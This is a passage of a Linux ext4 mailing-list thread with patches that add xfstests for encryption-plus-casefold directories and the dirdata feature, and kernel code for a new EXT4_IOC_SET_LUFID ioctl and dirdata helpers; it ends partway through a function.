* [RFC PATCH v3 2/6] ext4/064 encryption + casefold feature combination WITHOUT dirdata
From: Artem Blagodarenko @ 2026-06-24 13:49 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
In-Reply-To: <20260624134957.19209-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
This test verifies that files created in directories with both
encryption and case-insensitive (casefold) attributes work correctly.
See ext4/065 for the same test WITH dirdata feature enabled.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
---
tests/ext4/064 | 153 +++++++++++++++++++++++++++++++++++++++++++++
tests/ext4/064.out | 17 +++++
2 files changed, 170 insertions(+)
diff --git a/tests/ext4/064 b/tests/ext4/064
new file mode 100755
index 00000000..53450927
--- /dev/null
+++ b/tests/ext4/064
@@ -0,0 +1,153 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+#
+# Copyright (c) 2026 The Lustre Collective. All Rights Reserved.
+# Author: Artem Blagodarenko <ablagodarenko@thelustrecollective.com>
+#
+# FS QA Test ext4/064
+#
+# Test ext4 encryption + casefold feature combination WITHOUT dirdata.
+# This test verifies that files created in directories with both
+# encryption and case-insensitive (casefold) attributes work correctly.
+# See ext4/065 for the same test WITH dirdata feature enabled.
+#
+. ./common/preamble
+_begin_fstest auto quick encrypt casefold
+
+# get standard environment and checks
+. ./common/filter
+. ./common/encrypt
+. ./common/casefold
+. ./common/attr
+
+_exclude_fs ext2
+_exclude_fs ext3
+
+_require_scratch_nocheck
+_require_scratch_encryption
+_require_scratch_casefold
+_require_xfs_io_command "set_encpolicy"
+_require_xfs_io_command "add_enckey"
+
+# Helper to add a v2 encryption key and set policy on a directory
+_setup_encrypted_casefold_dir()
+{
+ local dir=$1
+ local raw_key=$(_generate_raw_encryption_key)
+ local keyspec=$(_add_enckey $SCRATCH_MNT "$raw_key" | awk '{print $NF}')
+ _set_encpolicy $dir $keyspec
+ _casefold_set_attr $dir
+ echo $keyspec
+}
+
+# Create a filesystem with both encrypt and casefold features
+_scratch_mkfs -O encrypt,casefold &>>$seqres.full
+_scratch_mount
+
+# Test 1: Create an encrypted + casefolded directory and verify lookups work
+echo "Test 1: Basic encrypted casefold lookup"
+mkdir $SCRATCH_MNT/test1
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test1 > /dev/null
+
+# Create file with lowercase, lookup with uppercase
+echo "hello" > $SCRATCH_MNT/test1/testfile.txt
+if [ -f "$SCRATCH_MNT/test1/TESTFILE.TXT" ]; then
+ echo "Case-insensitive lookup works in encrypted dir"
+else
+ echo "FAIL: Case-insensitive lookup failed in encrypted dir"
+fi
+
+# Verify the exact name on disk is preserved
+if _casefold_check_exact_name "$SCRATCH_MNT/test1" "testfile.txt"; then
+ echo "Original filename preserved"
+else
+ echo "FAIL: Original filename not preserved"
+fi
+
+# Test 2: Create files with different case variations
+echo "Test 2: Conflicting names in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test2
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test2 > /dev/null
+
+echo "first" > $SCRATCH_MNT/test2/MyFile.txt
+# This should fail or overwrite since "MYFILE.TXT" is equivalent
+echo "second" > $SCRATCH_MNT/test2/MYFILE.TXT 2>/dev/null
+content=$(cat $SCRATCH_MNT/test2/myfile.txt)
+echo "Content after writes: $content"
+
+# Test 3: Unicode normalization in encrypted casefold dir
+echo "Test 3: Unicode in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test3
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test3 > /dev/null
+
+# Test with UTF-8 characters
+fr_file1=$(echo -e "cafe\xcc\x81.txt")
+fr_file2=$(echo -e "caf\xc3\xa9.txt")
+echo "french" > "$SCRATCH_MNT/test3/$fr_file1"
+if [ -f "$SCRATCH_MNT/test3/$fr_file2" ]; then
+ echo "Unicode normalization works in encrypted dir"
+else
+ echo "FAIL: Unicode normalization failed in encrypted dir"
+fi
+
+# Test 4: Directory operations in encrypted casefold dir
+echo "Test 4: Directory operations in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test4
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test4 > /dev/null
+
+mkdir $SCRATCH_MNT/test4/SubDir
+if [ -d "$SCRATCH_MNT/test4/SUBDIR" ]; then
+ echo "Directory case-insensitive lookup works"
+else
+ echo "FAIL: Directory case-insensitive lookup failed"
+fi
+
+# Test 5: Verify inheritance of casefold+encryption in subdirectories
+echo "Test 5: Inheritance of attributes"
+mkdir $SCRATCH_MNT/test5
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test5 > /dev/null
+
+mkdir $SCRATCH_MNT/test5/child
+echo "data" > $SCRATCH_MNT/test5/child/file.txt
+if [ -f "$SCRATCH_MNT/test5/CHILD/FILE.TXT" ]; then
+ echo "Attributes inherited correctly"
+else
+ echo "FAIL: Attributes not inherited"
+fi
+
+# Test 6: Remove and recreate with different case
+echo "Test 6: Remove and recreate with different case"
+mkdir $SCRATCH_MNT/test6
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test6 > /dev/null
+
+echo "original" > $SCRATCH_MNT/test6/RemoveMe.txt
+rm $SCRATCH_MNT/test6/REMOVEME.TXT
+echo "recreated" > $SCRATCH_MNT/test6/REMOVEME.TXT
+if _casefold_check_exact_name "$SCRATCH_MNT/test6" "REMOVEME.TXT"; then
+ echo "Recreated file has new case"
+else
+ echo "FAIL: Recreated file case incorrect"
+fi
+
+# Test 7: Hard links in encrypted casefold dir
+echo "Test 7: Hard links in encrypted casefold dir"
+mkdir $SCRATCH_MNT/test7
+_setup_encrypted_casefold_dir $SCRATCH_MNT/test7 > /dev/null
+
+echo "linkdata" > $SCRATCH_MNT/test7/original.txt
+ln $SCRATCH_MNT/test7/original.txt $SCRATCH_MNT/test7/hardlink.txt
+if [ -f "$SCRATCH_MNT/test7/HARDLINK.TXT" ]; then
+ echo "Hard link case-insensitive lookup works"
+else
+ echo "FAIL: Hard link case-insensitive lookup failed"
+fi
+
+# Cleanup and verify filesystem
+_scratch_unmount
+_check_scratch_fs
+
+echo "Encrypted casefold tests completed"
+
+# success, all done
+status=0
+exit
diff --git a/tests/ext4/064.out b/tests/ext4/064.out
new file mode 100644
index 00000000..0197e51e
--- /dev/null
+++ b/tests/ext4/064.out
@@ -0,0 +1,17 @@
+QA output created by 064
+Test 1: Basic encrypted casefold lookup
+Case-insensitive lookup works in encrypted dir
+Original filename preserved
+Test 2: Conflicting names in encrypted casefold dir
+Content after writes: second
+Test 3: Unicode in encrypted casefold dir
+Unicode normalization works in encrypted dir
+Test 4: Directory operations in encrypted casefold dir
+Directory case-insensitive lookup works
+Test 5: Inheritance of attributes
+Attributes inherited correctly
+Test 6: Remove and recreate with different case
+Recreated file has new case
+Test 7: Hard links in encrypted casefold dir
+Hard link case-insensitive lookup works
+Encrypted casefold tests completed
--
2.43.7
^ permalink raw reply related
* [RFC PATCH v3 1/6] ext4: add common helper to check whether dirdata is applied
From: Artem Blagodarenko @ 2026-06-24 13:49 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
In-Reply-To: <20260624134957.19209-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Add a helper that lists a directory with the -lD flags and checks
whether any dirdata fields exist.
This helper will be used by subsequent dirdata-related patches.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
---
common/ext4 | 34 ++++++++++++++++++++++++++++++++++
1 file changed, 34 insertions(+)
diff --git a/common/ext4 b/common/ext4
index a2ce456d..47c31db9 100644
--- a/common/ext4
+++ b/common/ext4
@@ -242,3 +242,37 @@ _ext4_get_inum_iflags() {
debugfs -R "stat <${inumber}>" "${dev}" 2> /dev/null | \
sed -n 's/^.*Flags: \([0-9a-fx]*\).*$/\1/p'
}
+
+# Helper to dump directory structure with hash info (requires dirdata feature)
+# This is useful for verifying that dirdata is storing hash information
+_dump_dir_structure()
+{
+ local dir=$1
+ local dir_name=$(basename $dir)
+ local expected=$3
+
+ local debugfs_output=$({
+ echo "cd $dir_name"
+ echo "ls -lD ."
+ echo "quit"
+ } | debugfs $SCRATCH_DEV 2>/dev/null)
+
+ # DEBUG: uncomment to see full debugfs output
+ # echo " [DEBUG] debugfs output for $dir_name:"
+ # echo "$debugfs_output" | grep -v "^debugfs:" | sed 's/^/ /'
+
+ # Check if hash data is present (encryption+casefold+dirdata case)
+ # or if fid data is present (dirdata+encryption or dirdata only case)
+ if echo "$debugfs_output" | grep -q "fid="; then
+ local fid_value=$(echo "$debugfs_output" | grep -o "fid=[^ ]*" | head -1 | sed 's/^fid=//')
+ if [ "$fid_value" = "$expected" ]; then
+ echo " Directory structure of $dir_name: OK (dirdata verified)"
+ else
+ echo " Directory structure of $dir_name: FAILED (fid mismatch: got '$fid_value', expected '$expected')"
+ fi
+ elif echo "$debugfs_output" | grep -q "hash="; then
+ echo " Directory structure of $dir_name: OK (dirdata verified)"
+ else
+ echo " Directory structure of $dir_name: FAILED (no dirdata)"
+ fi
+}
--
2.43.7
^ permalink raw reply related
* [RFC PATCH v3 0/6] ext4: tests for the dirdata feature (encryption+casefold, LUFID)
From: Artem Blagodarenko @ 2026-06-24 13:49 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
These tests cover the ext4 "dirdata" feature (storing extra metadata
in directory entries beyond the file name), sent separately from the
kernel and e2fsprogs dirdata patch series for reference and review.
ext4/064 and ext4/065 verify that encryption and case-insensitive
(casefold) directories continue to work both without and with
dirdata enabled. ext4/066 and ext4/067 exercise the LUFID (Locally
Unique File ID) use of dirdata via a new EXT4_IOC_SET_LUFID ioctl,
using a small set_lufid helper utility added in this series.
Changes in v2:
- Ted Ts'o pointed out that the v1 tests exercised the
encryption+casefold/dirdata feature combination without actually
validating that the encrypted hash was stored as a dirdata
attribute (https://lore.kernel.org/all/20260418214359.GA58909@macsyma-wired.lan/).
ext4/064 and ext4/065 now use the new _dump_dir_structure helper
(debugfs-based) to dump and check the on-disk directory entry
content, confirming the hash is actually present as dirdata rather
than just exercising the feature combination.
- Zorro Lang asked about a confusingly-named helper
(_require_encrypted_casefold vs. _require_scratch_casefold); the
tests now consistently use _require_scratch_casefold.
- Added ext4/066 and ext4/067, plus a new common/ext4 helper and the
src/set_lufid.c utility, to directly verify LUFID data is correctly
stored in and retrieved from dirdata via EXT4_IOC_SET_LUFID, including
in combination with encryption+casefold.
Changes in v3:
- Fixed two off-by-one bugs in src/set_lufid.c, found while testing
the kernel-side EXT4_IOC_SET_LUFID fixes against this suite:
- The default (binary fid array) payload path computed
data_len = sizeof(fid) + 1, copying one byte of stack garbage past
the 16-byte LUFID struct.
- The explicit (argv[3]) payload path computed
data_len = strlen(lufid_data) + 1, treating a NUL terminator as
part of a binary payload that doesn't have one.
Both surfaced as a phantom extra FID in ext4/066 and ext4/067's
dirdata-dump verification once a kernel-side dirdata length
accounting bug was itself fixed -- that kernel bug had been
silently masking this test bug by truncating the same garbage byte
on write.
Artem Blagodarenko (6):
ext4: add common helper to check whether dirdata is applied
ext4/064 encryption + casefold feature combination WITHOUT dirdata
ext4/065 encryption + casefold + dirdata feature combination
ext4: add set_lufid utility
ext4/066: verify LUFID dirdata operations
ext4/067: LUFID and encryption+casefold+dirdata
common/config | 1 +
common/ext4 | 34 +++++++
src/Makefile | 2 +-
src/set_lufid.c | 196 ++++++++++++++++++++++++++++++++++++++++
tests/ext4/064 | 153 ++++++++++++++++++++++++++++++++
tests/ext4/064.out | 17 ++++
tests/ext4/065 | 217 +++++++++++++++++++++++++++++++++++++++++++++
tests/ext4/065.out | 26 ++++++
tests/ext4/066 | 158 +++++++++++++++++++++++++++++++++
tests/ext4/066.out | 4 +
tests/ext4/067 | 137 ++++++++++++++++++++++++++++
tests/ext4/067.out | 4 +
12 files changed, 948 insertions(+), 1 deletion(-)
create mode 100644 src/set_lufid.c
create mode 100755 tests/ext4/064
create mode 100644 tests/ext4/064.out
create mode 100755 tests/ext4/065
create mode 100644 tests/ext4/065.out
create mode 100755 tests/ext4/066
create mode 100644 tests/ext4/066.out
create mode 100755 tests/ext4/067
create mode 100644 tests/ext4/067.out
--
2.43.7
^ permalink raw reply
* [PATCH v4 11/11] ext4: Add EXT4_IOC_SET_LUFID ioctl for setting LUFID on directory entries
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Add a new ioctl command that allows setting LUFID (Locally Unique File ID)
data on existing directory entries. This includes:
- ext4_ioctl_set_lufid(): ioctl handler that validates parameters and
calls the underlying implementation
- ext4_set_direntry_lufid(): Core function that performs the operation by:
* Looking up the target directory entry
* Retrieving the associated inode
* Deleting the old entry and re-creating it with LUFID data attached
This implementation requires the dirdata feature to be enabled on the
filesystem and properly handles transactions and inode locking to ensure
consistency.
Signed-off-by: Artem Blagodarenko artem.blagodarenko@gmail.com
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 15 ++++
fs/ext4/ioctl.c | 84 +++++++++++++++++++++
fs/ext4/namei.c | 155 ++++++++++++++++++++++++++++++++++++++
include/uapi/linux/ext4.h | 13 ++++
4 files changed, 267 insertions(+)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 5674a64f830f..252a5a529205 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -1227,6 +1227,7 @@ struct ext4_inode_info {
#ifdef CONFIG_FS_ENCRYPTION
struct fscrypt_inode_info *i_crypt_info;
#endif
+ void *i_dirdata;
};
/*
@@ -2601,6 +2602,18 @@ struct ext4_dirent_hash {
struct ext4_dir_entry_hash dh_hash;
} __packed;
+static inline
+struct ext4_dirent_fid *ext4_dentry_get_fid(struct super_block *sb,
+ struct ext4_dentry_param *p)
+{
+ if (!ext4_has_feature_dirdata(sb))
+ return NULL;
+ if (p && p->edp_magic == EXT4_LUFID_MAGIC)
+ return &p->edp_dfid;
+
+ return NULL;
+}
+
#define EXT4_FT_DIR_CSUM 0xDE
/*
@@ -3302,6 +3315,8 @@ static inline int ext4_init_new_dir(handle_t *handle, struct inode *dir,
}
extern int ext4_dirblock_csum_verify(struct inode *inode,
struct buffer_head *bh);
+extern int ext4_dirdata_set_lufid(struct inode *dir, const char *filename,
+ int namelen, struct ext4_dentry_param *edp);
extern int ext4_htree_fill_tree(struct file *dir_file, __u32 start_hash,
__u32 start_minor_hash, __u32 *next_hash);
extern int ext4_search_dir(struct buffer_head *bh,
diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
index c8387e6a2c6e..725e46e1e46d 100644
--- a/fs/ext4/ioctl.c
+++ b/fs/ext4/ioctl.c
@@ -1535,6 +1535,87 @@ static int ext4_ioctl_set_tune_sb(struct file *filp,
return ret;
}
+/*
+ * ext4_ioctl_set_lufid() - Set LUFID on a directory entry
+ * @filp: file pointer (parent directory)
+ * @arg: pointer to ext4_set_lufid structure with filename and LUFID data
+ *
+ * This ioctl allows setting LUFID data on an existing
+ * directory entry. It is called on the parent directory with a filename and
+ * LUFID data.
+ */
+static long ext4_ioctl_set_lufid(struct file *filp, unsigned long arg)
+{
+ struct inode *dir = file_inode(filp);
+ struct mnt_idmap *idmap = file_mnt_idmap(filp);
+ struct ext4_set_lufid lufid_args;
+ struct {
+ __u32 edp_magic;
+ struct ext4_dirent_data_header df_header;
+ char df_fid[255];
+ } edp;
+ int err;
+
+ /* Check if parent is a directory */
+ if (!S_ISDIR(dir->i_mode))
+ return -ENOTDIR;
+
+ /* This ioctl mutates directory entries; merely having the directory
+ * open (which only ever requires read access) is not enough */
+ err = inode_permission(idmap, dir, MAY_WRITE);
+ if (err)
+ return err;
+
+ /* Copy arguments from user space */
+ if (copy_from_user(&lufid_args, (struct ext4_set_lufid __user *)arg,
+ sizeof(lufid_args)))
+ return -EFAULT;
+
+ /* Validate parameters */
+ if (lufid_args.esl_name_len == 0 || lufid_args.esl_name_len > EXT4_NAME_LEN)
+ return -EINVAL;
+
+ /* ddh_length (esl_data_len + the header byte below) must itself fit
+ * in the __u8 ddh_length field without wrapping */
+ if (lufid_args.esl_data_len == 0 ||
+ lufid_args.esl_data_len > 255 - sizeof(edp.df_header))
+ return -EINVAL;
+
+ /* Ensure filename is NUL-terminated and unmodified */
+ if (lufid_args.esl_name[lufid_args.esl_name_len - 1] != '\0')
+ return -EINVAL;
+
+ /* '.' and '..' are not ordinary entries -- they must stay the first
+ * two entries in the directory's first block, so they can't go
+ * through the general delete+re-add path this ioctl uses */
+ if (!strcmp(lufid_args.esl_name, ".") || !strcmp(lufid_args.esl_name, ".."))
+ return -EINVAL;
+
+ /* Prepare the dentry param struct with LUFID data. ddh_length is
+ * documented (see struct ext4_dirent_data_header) as the length of
+ * the header plus the whole data blob -- include the header here so
+ * every dirdata reader/writer that takes ddh_length at face value
+ * (e.g. ext4_dirdata_set()'s memcpy) copies the full LUFID payload
+ * instead of silently dropping its last byte. */
+ edp.edp_magic = EXT4_LUFID_MAGIC;
+ edp.df_header.ddh_length = lufid_args.esl_data_len +
+ sizeof(edp.df_header);
+ memcpy(edp.df_fid, lufid_args.esl_data, lufid_args.esl_data_len);
+
+ /* Want write access */
+ err = mnt_want_write_file(filp);
+ if (err)
+ return err;
+
+ /* Call the helper function to do the actual work */
+ err = ext4_dirdata_set_lufid(dir, lufid_args.esl_name,
+ lufid_args.esl_name_len - 1,
+ (struct ext4_dentry_param *)&edp);
+
+ mnt_drop_write_file(filp);
+ return err;
+}
+
static long __ext4_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
struct inode *inode = file_inode(filp);
@@ -1921,6 +2002,8 @@ static long __ext4_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
(void __user *)arg);
case EXT4_IOC_SET_TUNE_SB_PARAM:
return ext4_ioctl_set_tune_sb(filp, (void __user *)arg);
+ case EXT4_IOC_SET_LUFID:
+ return ext4_ioctl_set_lufid(filp, arg);
default:
return -ENOTTY;
}
@@ -2000,6 +2083,7 @@ long ext4_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
case FS_IOC_SETFSLABEL:
case EXT4_IOC_GETFSUUID:
case EXT4_IOC_SETFSUUID:
+ case EXT4_IOC_SET_LUFID:
break;
default:
return -ENOIOCTLCMD;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 6fba1a7c0876..3aeea503f12d 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -2319,6 +2319,8 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
if (ext4_has_feature_metadata_csum(inode->i_sb))
csum_size = sizeof(struct ext4_dir_entry_tail);
+ dfid = ext4_dentry_get_fid(inode->i_sb,
+ (struct ext4_dentry_param *)EXT4_I(inode)->i_dirdata);
if (!de) {
if (dfid)
dlen = dfid->df_header.ddh_length;
@@ -2665,6 +2667,7 @@ static int ext4_add_entry(handle_t *handle, struct dentry *dentry,
{
struct inode *dir = d_inode(dentry->d_parent);
+ EXT4_I(inode)->i_dirdata = dentry->d_fsdata;
if (fscrypt_is_nokey_name(dentry))
return -ENOKEY;
return __ext4_add_entry(handle, dir, &dentry->d_name, inode);
@@ -4426,6 +4429,158 @@ static int ext4_rename2(struct mnt_idmap *idmap,
return ext4_rename(idmap, old_dir, old_dentry, new_dir, new_dentry, flags);
}
+/*
+ * ext4_dirdata_set_lufid() - Set LUFID data on an existing directory entry
+ * @dir: parent directory inode
+ * @filename: name of the file in the directory
+ * @namelen: length of filename
+ * @edp: pointer to initialized dentry param with LUFID data
+ *
+ * This function finds an existing directory entry, deletes it, and re-creates it
+ * with LUFID data attached. Used by the EXT4_IOC_SET_LUFID ioctl.
+ *
+ * Returns 0 on success, negative error code on failure.
+ */
+int ext4_dirdata_set_lufid(struct inode *dir, const char *filename,
+ int namelen, struct ext4_dentry_param *edp)
+{
+ struct super_block *sb = dir->i_sb;
+ struct ext4_filename fname;
+ struct ext4_dir_entry_2 *de = NULL;
+ struct buffer_head *bh = NULL;
+ struct inode *inode = NULL;
+ handle_t *handle = NULL;
+ struct qstr d_name;
+ void *old_dirdata = NULL;
+ int err = 0;
+
+ /* Check if dirdata feature is enabled */
+ if (!ext4_has_feature_dirdata(sb))
+ return -ENOTSUPP;
+
+ if (namelen > EXT4_NAME_LEN)
+ return -ENAMETOOLONG;
+ if (namelen != strnlen(filename, namelen + 1))
+ return -EINVAL;
+
+ /* Setup the filename for lookup */
+ d_name.name = filename;
+ d_name.len = namelen;
+
+ /* Lookup the filename in the directory */
+ err = ext4_fname_setup_filename(dir, &d_name, 0, &fname);
+ if (err)
+ goto out_free;
+
+ bh = ext4_find_entry(dir, &d_name, &de, NULL);
+ if (!bh) {
+ err = -ENOENT;
+ goto out_free;
+ }
+
+ /* Get the inode number from the directory entry */
+ inode = ext4_iget(sb, le32_to_cpu(de->inode), EXT4_IGET_NORMAL);
+ if (IS_ERR(inode)) {
+ err = PTR_ERR(inode);
+ inode = NULL;
+ goto out_brelse;
+ }
+
+ /* Start a transaction */
+ handle = ext4_journal_start(dir, EXT4_HT_DIR,
+ 2 * EXT4_DATA_TRANS_BLOCKS(sb) +
+ EXT4_INDEX_EXTRA_TRANS_BLOCKS);
+ if (IS_ERR(handle)) {
+ err = PTR_ERR(handle);
+ handle = NULL;
+ goto out_iput;
+ }
+
+ inode_lock(dir);
+
+ /* EXT4_I(inode)->i_dirdata below is a *shared* per-inode field used
+ * to smuggle the LUFID payload into ext4_add_entry(); locking only
+ * dir does not stop a concurrent EXT4_IOC_SET_LUFID call targeting a
+ * different hardlink of the same inode (different dir, same inode)
+ * from clobbering it mid-call with its own stack-local pointer.
+ * Lock the target inode too, consistently dir-then-inode, to
+ * serialize the i_dirdata set/use/restore window below. */
+ if (inode != dir)
+ inode_lock_nested(inode, I_MUTEX_NONDIR2);
+
+ /* Delete the old entry */
+ err = ext4_delete_entry(handle, dir, de, bh);
+ if (err)
+ goto out_unlock;
+
+ brelse(bh);
+ bh = NULL;
+
+ /* Re-add the entry with LUFID data
+ * We set i_dirdata before adding so the entry can include it
+ */
+ old_dirdata = EXT4_I(inode)->i_dirdata;
+ EXT4_I(inode)->i_dirdata = edp;
+
+ /* Use ext4_add_entry() to properly handle hash table management
+ * and block splitting, just like rename does. This ensures the entry
+ * is placed in the correct hash block and avoids breaking dirhash.
+ */
+ {
+ struct dentry parent_dentry = { .d_inode = dir };
+ struct dentry new_dentry = {
+ .d_name = d_name,
+ .d_parent = &parent_dentry,
+ .d_inode = inode, /* Same inode (in-place update) */
+ .d_fsdata = edp, /* required */
+ };
+ err = ext4_add_entry(handle, &new_dentry, inode);
+ }
+ EXT4_I(inode)->i_dirdata = old_dirdata;
+
+ if (err) {
+ /*
+ * The original entry was already removed above and the
+ * re-add with the new LUFID failed; try to restore the
+ * original entry so the inode isn't left without any
+ * directory entry pointing at it.
+ */
+ struct dentry parent_dentry = { .d_inode = dir };
+ struct dentry orig_dentry = {
+ .d_name = d_name,
+ .d_parent = &parent_dentry,
+ .d_inode = inode,
+ };
+ int rollback_err = ext4_add_entry(handle, &orig_dentry, inode);
+
+ if (rollback_err)
+ EXT4_ERROR_INODE(dir,
+ "Failed to set LUFID on '%.*s' (err=%d) and failed to restore the original directory entry (err=%d); inode %llu may be orphaned",
+ namelen, filename, err, rollback_err,
+ inode->i_ino);
+ goto out_unlock;
+ }
+
+ /* Update inode times */
+ inode_set_ctime_current(dir);
+ inode_inc_iversion(dir);
+ ext4_mark_inode_dirty(handle, dir);
+
+out_unlock:
+ if (inode != dir)
+ inode_unlock(inode);
+ inode_unlock(dir);
+ ext4_journal_stop(handle);
+out_iput:
+ iput(inode);
+out_brelse:
+ brelse(bh);
+out_free:
+ ext4_fname_free_filename(&fname);
+
+ return err;
+}
+
/*
* directories can handle most operations...
*/
diff --git a/include/uapi/linux/ext4.h b/include/uapi/linux/ext4.h
index 9c683991c32f..9fab8978843b 100644
--- a/include/uapi/linux/ext4.h
+++ b/include/uapi/linux/ext4.h
@@ -35,6 +35,7 @@
#define EXT4_IOC_SETFSUUID _IOW('f', 44, struct fsuuid)
#define EXT4_IOC_GET_TUNE_SB_PARAM _IOR('f', 45, struct ext4_tune_sb_params)
#define EXT4_IOC_SET_TUNE_SB_PARAM _IOW('f', 46, struct ext4_tune_sb_params)
+#define EXT4_IOC_SET_LUFID _IOW('f', 47, struct ext4_set_lufid)
#define EXT4_IOC_SHUTDOWN _IOR('X', 125, __u32)
@@ -92,6 +93,18 @@ struct move_extent {
__u64 moved_len; /* moved block length */
};
+/*
+ * Structure for EXT4_IOC_SET_LUFID
+ * Sets LUFID on a directory entry
+ * Called on parent directory with filename and LUFID data as arguments
+ */
+struct ext4_set_lufid {
+ __u8 esl_name_len; /* length of filename */
+ char esl_name[255 + 1]; /* filename (NUL-terminated) */
+ __u8 esl_data_len; /* length of LUFID data */
+ char esl_data[255]; /* LUFID data (raw bytes) */
+};
+
/*
* Flags used by EXT4_IOC_SHUTDOWN
*/
--
2.43.7
^ permalink raw reply related
* [PATCH v4 10/11] ext4: add dirdata set/get helpers
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Add helpers to set and retrieve dirdata payload and hook them up at
the appropriate call sites.
Enable dirdata for casefold+encryption hashes and storing unique
128-bit file identifier in the directory entry for testing.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
foofile.txt | 0
fs/ext4/ext4.h | 4 +
fs/ext4/inline.c | 6 +-
fs/ext4/namei.c | 227 +++++++++++++++++++++++++++++++++++++++++------
4 files changed, 207 insertions(+), 30 deletions(-)
diff --git a/foofile.txt b/foofile.txt
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 1e61ce13ed07..5674a64f830f 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -3874,6 +3874,10 @@ extern int __ext4_unlink(struct inode *dir, const struct qstr *d_name,
struct inode *inode, struct dentry *dentry);
extern int __ext4_link(struct inode *dir, struct inode *inode,
const struct qstr *d_name, struct dentry *dentry);
+extern unsigned char ext4_dirdata_get(struct ext4_dir_entry_2 *de,
+ struct inode *dir,
+ struct ext4_dirent_fid *lufid,
+ struct dx_hash_info *hinfo);
#define S_SHIFT 12
static const unsigned char ext4_type_by_mode[(S_IFMT >> S_SHIFT) + 1] = {
diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
index 1fff4defd45b..32b4ff83d4df 100644
--- a/fs/ext4/inline.c
+++ b/fs/ext4/inline.c
@@ -1350,10 +1350,8 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
}
}
- if (ext4_hash_in_dirent(dir)) {
- hinfo->hash = EXT4_DIRENT_HASH(de);
- hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
- } else {
+ if (!(ext4_dirdata_get(de, dir, NULL, hinfo) &
+ EXT4_DIRENT_CFHASH)) {
err = ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
if (err) {
ret = err;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 91def9e0f84d..6fba1a7c0876 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -1108,22 +1108,22 @@ static int htree_dirblock_to_tree(struct file *dir_file,
/* silently ignore the rest of the block */
break;
}
- if (ext4_hash_in_dirent(dir)) {
- if (de->name_len && de->inode) {
- hinfo->hash = EXT4_DIRENT_HASH(de);
- hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
- } else {
- hinfo->hash = 0;
- hinfo->minor_hash = 0;
- }
+ if (de->name_len && de->inode) {
+ /* check for saved hash first, or generate it from name */
+ if (!(ext4_dirdata_get(de, dir, NULL, hinfo) &
+ EXT4_DIRENT_CFHASH)) {
+ err = ext4fs_dirhash(dir, de->name,
+ de->name_len, hinfo);
+ if (err < 0) {
+ count = err;
+ goto errout;
+ }
+ }
} else {
- err = ext4fs_dirhash(dir, de->name,
- de->name_len, hinfo);
- if (err < 0) {
- count = err;
- goto errout;
- }
+ hinfo->hash = 0;
+ hinfo->minor_hash = 0;
}
+
if ((hinfo->hash < start_hash) ||
((hinfo->hash == start_hash) &&
(hinfo->minor_hash < start_minor_hash)))
@@ -1301,9 +1301,191 @@ static inline int search_dirblock(struct buffer_head *bh,
*/
/*
- * Create map of hash values, offsets, and sizes, stored at end of block.
- * Returns number of entries mapped.
+ * ext4_dirdata_get() - Read dirdata fields from a directory entry.
+ * @de: directory entry
+ * @dir: directory inode (used for fscrypt+casefold hash fallback)
+ * @dfid: if non-NULL and EXT4_DIRENT_LUFID is set, LUFID data is copied
+ * here
+ * @hinfo: if non-NULL, receives the casefold hash and minor hash
+ *
+ * Reads any dirdata stored in @de. If the dirdata feature is not enabled,
+ * falls back to reading the hash stored inline after the filename (for
+ * compatibility with the older casefold+fscrypt format).
+ *
+ * Returns a bitmask of EXT4_DIRENT_* flags indicating which fields were read.
+ */
+unsigned char ext4_dirdata_get(struct ext4_dir_entry_2 *de, struct inode *dir,
+ struct ext4_dirent_fid *dfid,
+ struct dx_hash_info *hinfo)
+{
+ unsigned char ret = 0;
+ unsigned int data_offset = de->name_len + 1;
